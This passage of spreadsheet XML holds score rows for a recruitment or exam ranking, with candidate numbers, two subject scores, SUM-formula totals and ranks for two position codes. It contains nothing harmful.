        <v>55.2</v>
      </c>
      <c r="F433" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G433" s="8"/>
      <c r="H433" s="8" t="n">
        <f aca="false">SUM(E433:G433)</f>
        <v>113.8</v>
      </c>
      <c r="I433" s="8" t="n">
        <v>49</v>
      </c>
    </row>
    <row r="434" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A434" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B434" s="8" t="n">
        <v>1314011519</v>
      </c>
      <c r="C434" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D434" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E434" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F434" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G434" s="8"/>
      <c r="H434" s="8" t="n">
        <f aca="false">SUM(E434:G434)</f>
        <v>113.2</v>
      </c>
      <c r="I434" s="8" t="n">
        <v>50</v>
      </c>
    </row>
    <row r="435" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A435" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B435" s="8" t="n">
        <v>1314011421</v>
      </c>
      <c r="C435" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D435" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E435" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F435" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G435" s="8"/>
      <c r="H435" s="8" t="n">
        <f aca="false">SUM(E435:G435)</f>
        <v>113</v>
      </c>
      <c r="I435" s="8" t="n">
        <v>51</v>
      </c>
    </row>
    <row r="436" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A436" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B436" s="8" t="n">
        <v>1314011428</v>
      </c>
      <c r="C436" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D436" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E436" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F436" s="8" t="n">
        <v>56</v>
      </c>
      <c r="G436" s="8"/>
      <c r="H436" s="8" t="n">
        <f aca="false">SUM(E436:G436)</f>
        <v>112.6</v>
      </c>
      <c r="I436" s="8" t="n">
        <v>52</v>
      </c>
    </row>
    <row r="437" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A437" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B437" s="8" t="n">
        <v>1314011527</v>
      </c>
      <c r="C437" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D437" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E437" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F437" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G437" s="8"/>
      <c r="H437" s="8" t="n">
        <f aca="false">SUM(E437:G437)</f>
        <v>112.6</v>
      </c>
      <c r="I437" s="8" t="n">
        <v>52</v>
      </c>
    </row>
    <row r="438" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A438" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B438" s="8" t="n">
        <v>1314011515</v>
      </c>
      <c r="C438" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D438" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E438" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="F438" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G438" s="8"/>
      <c r="H438" s="8" t="n">
        <f aca="false">SUM(E438:G438)</f>
        <v>111.6</v>
      </c>
      <c r="I438" s="8" t="n">
        <v>54</v>
      </c>
    </row>
    <row r="439" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A439" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B439" s="8" t="n">
        <v>1314011508</v>
      </c>
      <c r="C439" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D439" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E439" s="8" t="n">
        <v>50.6</v>
      </c>
      <c r="F439" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G439" s="8"/>
      <c r="H439" s="8" t="n">
        <f aca="false">SUM(E439:G439)</f>
        <v>111</v>
      </c>
      <c r="I439" s="8" t="n">
        <v>55</v>
      </c>
    </row>
    <row r="440" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A440" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B440" s="8" t="n">
        <v>1314011622</v>
      </c>
      <c r="C440" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D440" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E440" s="8" t="n">
        <v>50.8</v>
      </c>
      <c r="F440" s="8" t="n">
        <v>58.8</v>
      </c>
      <c r="G440" s="8"/>
      <c r="H440" s="8" t="n">
        <f aca="false">SUM(E440:G440)</f>
        <v>109.6</v>
      </c>
      <c r="I440" s="8" t="n">
        <v>56</v>
      </c>
    </row>
    <row r="441" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A441" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B441" s="8" t="n">
        <v>1314011610</v>
      </c>
      <c r="C441" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D441" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E441" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F441" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G441" s="8"/>
      <c r="H441" s="8" t="n">
        <f aca="false">SUM(E441:G441)</f>
        <v>109.4</v>
      </c>
      <c r="I441" s="8" t="n">
        <v>57</v>
      </c>
    </row>
    <row r="442" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A442" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B442" s="8" t="n">
        <v>1314011614</v>
      </c>
      <c r="C442" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D442" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E442" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F442" s="8" t="n">
        <v>57</v>
      </c>
      <c r="G442" s="8"/>
      <c r="H442" s="8" t="n">
        <f aca="false">SUM(E442:G442)</f>
        <v>109.4</v>
      </c>
      <c r="I442" s="8" t="n">
        <v>57</v>
      </c>
    </row>
    <row r="443" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A443" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B443" s="8" t="n">
        <v>1314011416</v>
      </c>
      <c r="C443" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D443" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E443" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="F443" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="G443" s="8"/>
      <c r="H443" s="8" t="n">
        <f aca="false">SUM(E443:G443)</f>
        <v>109.2</v>
      </c>
      <c r="I443" s="8" t="n">
        <v>59</v>
      </c>
    </row>
    <row r="444" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A444" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B444" s="8" t="n">
        <v>1314011528</v>
      </c>
      <c r="C444" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D444" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E444" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F444" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G444" s="8"/>
      <c r="H444" s="8" t="n">
        <f aca="false">SUM(E444:G444)</f>
        <v>108.2</v>
      </c>
      <c r="I444" s="8" t="n">
        <v>60</v>
      </c>
    </row>
    <row r="445" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A445" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B445" s="8" t="n">
        <v>1314011621</v>
      </c>
      <c r="C445" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D445" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E445" s="8" t="n">
        <v>50.8</v>
      </c>
      <c r="F445" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="G445" s="8"/>
      <c r="H445" s="8" t="n">
        <f aca="false">SUM(E445:G445)</f>
        <v>107.6</v>
      </c>
      <c r="I445" s="8" t="n">
        <v>61</v>
      </c>
    </row>
    <row r="446" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A446" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B446" s="8" t="n">
        <v>1314011615</v>
      </c>
      <c r="C446" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D446" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E446" s="8" t="n">
        <v>45.6</v>
      </c>
      <c r="F446" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G446" s="8"/>
      <c r="H446" s="8" t="n">
        <f aca="false">SUM(E446:G446)</f>
        <v>107</v>
      </c>
      <c r="I446" s="8" t="n">
        <v>62</v>
      </c>
    </row>
    <row r="447" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A447" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B447" s="8" t="n">
        <v>1314011628</v>
      </c>
      <c r="C447" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D447" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E447" s="8" t="n">
        <v>45.6</v>
      </c>
      <c r="F447" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G447" s="8"/>
      <c r="H447" s="8" t="n">
        <f aca="false">SUM(E447:G447)</f>
        <v>106.8</v>
      </c>
      <c r="I447" s="8" t="n">
        <v>63</v>
      </c>
    </row>
    <row r="448" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A448" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B448" s="8" t="n">
        <v>1314011617</v>
      </c>
      <c r="C448" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D448" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E448" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="F448" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="G448" s="8"/>
      <c r="H448" s="8" t="n">
        <f aca="false">SUM(E448:G448)</f>
        <v>105.8</v>
      </c>
      <c r="I448" s="8" t="n">
        <v>64</v>
      </c>
    </row>
    <row r="449" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A449" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B449" s="8" t="n">
        <v>1314011407</v>
      </c>
      <c r="C449" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D449" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E449" s="8" t="n">
        <v>52</v>
      </c>
      <c r="F449" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="G449" s="8"/>
      <c r="H449" s="8" t="n">
        <f aca="false">SUM(E449:G449)</f>
        <v>104.8</v>
      </c>
      <c r="I449" s="8" t="n">
        <v>65</v>
      </c>
    </row>
    <row r="450" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A450" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B450" s="8" t="n">
        <v>1314011417</v>
      </c>
      <c r="C450" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D450" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E450" s="8" t="n">
        <v>45.2</v>
      </c>
      <c r="F450" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G450" s="8"/>
      <c r="H450" s="8" t="n">
        <f aca="false">SUM(E450:G450)</f>
        <v>104.6</v>
      </c>
      <c r="I450" s="8" t="n">
        <v>66</v>
      </c>
    </row>
    <row r="451" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A451" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B451" s="8" t="n">
        <v>1314011525</v>
      </c>
      <c r="C451" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D451" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E451" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="F451" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="G451" s="8"/>
      <c r="H451" s="8" t="n">
        <f aca="false">SUM(E451:G451)</f>
        <v>103.8</v>
      </c>
      <c r="I451" s="8" t="n">
        <v>67</v>
      </c>
    </row>
    <row r="452" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A452" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B452" s="8" t="n">
        <v>1314011408</v>
      </c>
      <c r="C452" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D452" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E452" s="8" t="n">
        <v>41.4</v>
      </c>
      <c r="F452" s="8" t="n">
        <v>57.8</v>
      </c>
      <c r="G452" s="8"/>
      <c r="H452" s="8" t="n">
        <f aca="false">SUM(E452:G452)</f>
        <v>99.2</v>
      </c>
      <c r="I452" s="8" t="n">
        <v>68</v>
      </c>
    </row>
    <row r="453" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A453" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B453" s="8" t="n">
        <v>1314011501</v>
      </c>
      <c r="C453" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D453" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E453" s="8" t="n">
        <v>44.8</v>
      </c>
      <c r="F453" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="G453" s="8"/>
      <c r="H453" s="8" t="n">
        <f aca="false">SUM(E453:G453)</f>
        <v>99</v>
      </c>
      <c r="I453" s="8" t="n">
        <v>69</v>
      </c>
    </row>
    <row r="454" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A454" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B454" s="8" t="n">
        <v>1314011530</v>
      </c>
      <c r="C454" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D454" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E454" s="8" t="n">
        <v>44.2</v>
      </c>
      <c r="F454" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="G454" s="8"/>
      <c r="H454" s="8" t="n">
        <f aca="false">SUM(E454:G454)</f>
        <v>97</v>
      </c>
      <c r="I454" s="8" t="n">
        <v>70</v>
      </c>
    </row>
    <row r="455" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A455" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B455" s="8" t="n">
        <v>1314011623</v>
      </c>
      <c r="C455" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D455" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E455" s="8" t="n">
        <v>44.6</v>
      </c>
      <c r="F455" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G455" s="8"/>
      <c r="H455" s="8" t="n">
        <f aca="false">SUM(E455:G455)</f>
        <v>96.8</v>
      </c>
      <c r="I455" s="8" t="n">
        <v>71</v>
      </c>
    </row>
    <row r="456" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A456" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B456" s="8" t="n">
        <v>1314011514</v>
      </c>
      <c r="C456" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D456" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E456" s="8" t="n">
        <v>38.6</v>
      </c>
      <c r="F456" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="G456" s="8"/>
      <c r="H456" s="8" t="n">
        <f aca="false">SUM(E456:G456)</f>
        <v>93</v>
      </c>
      <c r="I456" s="8" t="n">
        <v>72</v>
      </c>
    </row>
    <row r="457" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A457" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B457" s="8" t="n">
        <v>1314011430</v>
      </c>
      <c r="C457" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D457" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E457" s="8" t="n">
        <v>41</v>
      </c>
      <c r="F457" s="8" t="n">
        <v>50.4</v>
      </c>
      <c r="G457" s="8"/>
      <c r="H457" s="8" t="n">
        <f aca="false">SUM(E457:G457)</f>
        <v>91.4</v>
      </c>
      <c r="I457" s="8" t="n">
        <v>73</v>
      </c>
    </row>
    <row r="458" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A458" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B458" s="8" t="n">
        <v>1314011502</v>
      </c>
      <c r="C458" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D458" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E458" s="8" t="n">
        <v>41.4</v>
      </c>
      <c r="F458" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="G458" s="8"/>
      <c r="H458" s="8" t="n">
        <f aca="false">SUM(E458:G458)</f>
        <v>87.6</v>
      </c>
      <c r="I458" s="8" t="n">
        <v>74</v>
      </c>
    </row>
    <row r="459" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A459" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B459" s="8" t="n">
        <v>1314011606</v>
      </c>
      <c r="C459" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D459" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E459" s="8" t="n">
        <v>42.8</v>
      </c>
      <c r="F459" s="8" t="n">
        <v>41.2</v>
      </c>
      <c r="G459" s="8"/>
      <c r="H459" s="8" t="n">
        <f aca="false">SUM(E459:G459)</f>
        <v>84</v>
      </c>
      <c r="I459" s="8" t="n">
        <v>75</v>
      </c>
    </row>
    <row r="460" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A460" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B460" s="8" t="n">
        <v>1314011510</v>
      </c>
      <c r="C460" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D460" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E460" s="8" t="n">
        <v>36.8</v>
      </c>
      <c r="F460" s="8" t="n">
        <v>44.2</v>
      </c>
      <c r="G460" s="8"/>
      <c r="H460" s="8" t="n">
        <f aca="false">SUM(E460:G460)</f>
        <v>81</v>
      </c>
      <c r="I460" s="8" t="n">
        <v>76</v>
      </c>
    </row>
    <row r="461" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A461" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B461" s="8" t="n">
        <v>1314011418</v>
      </c>
      <c r="C461" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D461" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E461" s="8" t="n">
        <v>35.8</v>
      </c>
      <c r="F461" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="G461" s="8"/>
      <c r="H461" s="8" t="n">
        <f aca="false">SUM(E461:G461)</f>
        <v>79.2</v>
      </c>
      <c r="I461" s="8" t="n">
        <v>77</v>
      </c>
    </row>
    <row r="462" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A462" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B462" s="8" t="n">
        <v>1314011419</v>
      </c>
      <c r="C462" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D462" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E462" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F462" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G462" s="8"/>
      <c r="H462" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I462" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="463" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A463" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B463" s="8" t="n">
        <v>1314011423</v>
      </c>
      <c r="C463" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D463" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E463" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F463" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G463" s="8"/>
      <c r="H463" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I463" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="464" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A464" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B464" s="8" t="n">
        <v>1314011427</v>
      </c>
      <c r="C464" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D464" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E464" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F464" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G464" s="8"/>
      <c r="H464" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I464" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="465" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A465" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B465" s="8" t="n">
        <v>1314011429</v>
      </c>
      <c r="C465" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D465" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E465" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F465" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G465" s="8"/>
      <c r="H465" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I465" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="466" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A466" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B466" s="8" t="n">
        <v>1314011507</v>
      </c>
      <c r="C466" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D466" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E466" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F466" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G466" s="8"/>
      <c r="H466" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I466" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="467" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A467" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B467" s="8" t="n">
        <v>1314011520</v>
      </c>
      <c r="C467" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D467" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E467" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F467" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G467" s="8"/>
      <c r="H467" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I467" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="468" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A468" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B468" s="8" t="n">
        <v>1314011524</v>
      </c>
      <c r="C468" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D468" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E468" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F468" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G468" s="8"/>
      <c r="H468" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I468" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="469" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A469" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B469" s="8" t="n">
        <v>1314011609</v>
      </c>
      <c r="C469" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D469" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E469" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F469" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G469" s="8"/>
      <c r="H469" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I469" s="8" t="n">
        <v>78</v>
      </c>
    </row>
    <row r="470" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A470" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B470" s="8" t="n">
        <v>1314011523</v>
      </c>
      <c r="C470" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D470" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E470" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F470" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G470" s="8"/>
      <c r="H470" s="8" t="n">
        <v>-2</v>
      </c>
      <c r="I470" s="8" t="n">
        <v>86</v>
      </c>
    </row>
    <row r="471" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A471" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B471" s="8" t="n">
        <v>1314011701</v>
      </c>
      <c r="C471" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D471" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E471" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="F471" s="8" t="n">
        <v>68.2</v>
      </c>
      <c r="G471" s="8"/>
      <c r="H471" s="8" t="n">
        <f aca="false">SUM(E471:G471)</f>
        <v>135.8</v>
      </c>
      <c r="I471" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="472" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A472" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B472" s="8" t="n">
        <v>1314011702</v>
      </c>
      <c r="C472" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D472" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E472" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="F472" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="G472" s="8"/>
      <c r="H472" s="8" t="n">
        <f aca="false">SUM(E472:G472)</f>
        <v>132</v>
      </c>
      <c r="I472" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="473" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A473" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B473" s="8" t="n">
        <v>1314011630</v>
      </c>
      <c r="C473" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D473" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E473" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="F473" s="8" t="n">
        <v>69.6</v>
      </c>
      <c r="G473" s="8"/>
      <c r="H473" s="8" t="n">
        <f aca="false">SUM(E473:G473)</f>
        <v>131.8</v>
      </c>
      <c r="I473" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="474" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A474" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B474" s="8" t="n">
        <v>1314011704</v>
      </c>
      <c r="C474" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D474" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E474" s="8" t="n">
        <v>48.2</v>
      </c>
      <c r="F474" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G474" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H474" s="8" t="n">
        <f aca="false">SUM(E474:G474)</f>
        <v>117.4</v>
      </c>
      <c r="I474" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="475" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A475" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B475" s="8" t="n">
        <v>1314011629</v>
      </c>
      <c r="C475" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D475" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E475" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F475" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G475" s="8"/>
      <c r="H475" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I475" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="476" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A476" s="9" t="n">
        <v>4300080</v>
      </c>
      <c r="B476" s="8" t="n">
        <v>1314011703</v>
      </c>
      <c r="C476" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D476" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E476" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F476" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G476" s="8"/>
      <c r="H476" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I476" s="8" t="n">
        <v>5</v>
      </c>
